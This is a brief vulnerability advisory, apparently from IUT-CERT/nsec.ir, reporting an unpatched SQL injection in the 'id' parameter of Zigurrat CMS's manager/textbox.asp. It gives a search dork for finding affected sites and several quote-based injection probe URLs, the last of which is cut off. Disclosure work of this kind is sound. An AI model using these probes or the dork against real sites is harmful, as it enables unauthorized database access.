|
================= IUT-CERT ==================0D
=0D
Title: Zigurrat CMS SQL Injection Vulnerability=0D
=0D
Vendor: www.farsi-cms.com=0D
=0D
Dork: Design by Tagfa Co=0D
Type: Input.Validation.Vulnerability (SQL Injection)=0D
=0D
Fix: N/A=0D
=0D
================== nsec.ir ==================0D
=0D
Description:=0D
=0D
------------------=0D
=0D
Zigurrat CMS is a CMS producer in Iran. "manager/textbox.asp" pages in Pars CMS=0D
=0D
product are vulnerable to SQL Injection vulnerability.=0D
=0D
Vulnerability Variant:=0D
=0D
------------------=0D
Injection "manager/textbox.asp" in "id" parameter. =0D
=0D
http://www.example.com/manager/textbox.asp?id='=0D
=0D
http://www.example.com/manager/textbox.asp?id=0'=0D
=0D
http://www.example.com/manager/textbox.asp?id=%2527=0D
=0D
http://www.example.com/manager/textbox.asp?id=\'=0D
=0D
http://www.example.com/manager/textbox.asp?id=